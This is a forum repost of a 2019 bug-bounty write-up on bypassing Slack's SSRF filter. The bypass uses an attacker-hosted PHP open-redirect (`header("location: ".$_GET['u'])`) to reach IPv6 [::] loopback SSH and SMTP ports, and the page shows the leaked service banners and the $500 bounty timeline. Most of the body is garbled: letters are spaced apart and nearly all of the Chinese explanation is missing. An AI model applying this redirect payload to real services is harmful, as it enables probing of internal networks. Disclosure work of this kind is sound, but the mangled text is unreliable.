搜索

[13851] 2019-03-10_挖洞经验绕过Slack后端SSRF防护机制

文档创建者:s7ckTeam
浏览次数:13
最后更新:2025-01-18
2019-03-10_挖洞经验绕过Slack后端SSRF防护机制   |   S l a c k S S R F c l o u d s   F r e e B u f   2 0 1 9 - 0 3 - 1 0 S l a c k a p i . s l a c k . c o m S l a c k 线 线 S l a s h   C o m m a n d s S l a c k S S R F S l a c k S S R F S l a c k 使 便 使 S l a c k 线 线 S l a s h   C o m m a n d s S l a c k S S R F 线 / c o m m a n d s S l a c k 线 / w h o / a r c h i v e / c o l l a p s e 使 线 线 H a c k e r o n e N i c o l a s   G r é g o i r e   S l a c k   S S R F   N i c o l a s G r é g o i r e S l a c k I n t e g r a t i o n s   /   P h a b r i c a t o r I n t e g r a t i o n   /   S l a s h   C o m m a n d s U R L S l a c k l o o p b a c k ,   1 0 . 0 . 0 . 0 / 8 ,   1 9 2 . 1 6 8 . 0 . 0 / 2 4 访 使 [ : : ] S l a c k S l a c k I P v 6 S l a c k N i c o l a s   G r é g o i r e O u t g o i n g   P r o x y 线 I P v 6 S l a c k S S R F
1   a p i . s l a c k . c o m s l a c k 线 S l a s h   C o m m a n d s R e q u e s t   U R L   h t t p : / / 2 0 6 . 1 8 9 . 2 0 4 . 1 8 7 / 2 2 0 6 . 1 8 9 . 2 0 4 . 1 8 7 i n d e x . p h p 访 L o c a t i o n   h t t p : / / [ : : ] : 2 2 / N i c o l a s   G r é g o i r e h t t p : / / [ : : ] : 2 2 / S l a c k I P v 6 i n d e x . p h p 3 a p i . s l a c k . c o m 访 s l a c k   x x x x . s l a c k . c o m 线 h t t p : / / 2 0 6 . 1 8 9 . 2 0 4 . 1 8 7 / S l a c k 2 2 - h t t p : / / [ : : ] : 2 2 / 4 h t t p : / / 2 0 6 . 1 8 9 . 2 0 4 . 1 8 7 / < ? p h p   h e a d e r ( " l o c a t i o n :   h t t p : / / [ : : ] : 2 2 / " ) ;   ? >
i n d e x . p h p 访 h t t p : / / [ : : ] : 2 5 / S l a c k 2 5 S l a c k 2 2 P r o t o c o l   m i s m a t c h . S M T P   o n   T C P / 2 5 S l a c k 2 2 2 2 0   s q u i d 3 . t i n y s p e c k . c o m   E S M T P   P o s t f i x 2 2 1   2 . 7 . 0   E r r o r :   I   c a n   b r e a k   r u l e s ,   t o o .   G o o d b y e . S S R F 2 0 1 8 . 7 . 1 3   2 0 1 8 . 7 . 1 3   2 0 1 9 . 1 . 2 3   S l a c k   $ 5 0 0 2 0 1 9 . 2 . 2 2   S l a c k E v e n t   S u b s c r i p t i o n s S S R F S l a c k E v e n t   A P I h t t p s : / / a p i . s l a c k . c o m / e v e n t s - a p i c h a n n e l s S l a c k S l a c k E v e n t A P I S l a c k E v e n t   S u b s c r i p t i o n s R e q u e s t   U R L S l a c k H T T P   P O S T t y p e c h a l l e n g e t o k e n
S S R F -   h t t p s : / / a p i . s l a c k . c o m / a p p s / Y O U A P P C O D E / e v e n t - s u b s c r i p t i o n s ? U R L S l a c k   A P I Y o u r   r e q u e s t   U R L   g a v e   u s   a   5 0 0   e r r o r .   U p d a t e   y o u r   U R L   t o   r e c e i v e   a   n e w   r e q u e s t   a n d   c h a l l e n g e   v a l u e . I P v 6   [ : : ]   x . p h p U R L h t t p : / / h a c k e r . s i t e / x . p h p / ? u = h t t p : / / [ : : ] : 2 2 / U R L h t t p : / / h a c k e r . s i t e / x . p h p / ? u = h t t p : / / % 5 B : : % 5 D : 2 2 / R e q u e s t   U R L < ? p h p h e a d e r ( " l o c a t i o n :   " . $ _ G E T [ ' u ' ] ) ; ? >
S l a c k 2 2 S l a c k 2 5 " b o d y " :   {   S S H - 2 . 0 - O p e n S S H _ 7 . 2 p 2   U b u n t u - 4 u b u n t u 2 . 4 P r o t o c o l   m i s m a t c h . }
S l a c k S S R F " b o d y " :   {   2 2 0   s q u i d - i a d - y p f w . t i n y s p e c k . c o m   E S M T P   P o s t f i x 2 2 1   2 . 7 . 0   E r r o r :   I   c a n   b r e a k   r u l e s ,   t o o .   G o o d b y e . }
S l a c k S l a c k 2 0 1 8 . 7 . 2 4     2 0 1 8 . 9 . 2     2 0 1 9 . 1 . 2 3   S l a c k $ 5 0 0 2 0 1 9 . 2 . 2 2   * m e d i u m c l o u d s F r e e B u f . C O M
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理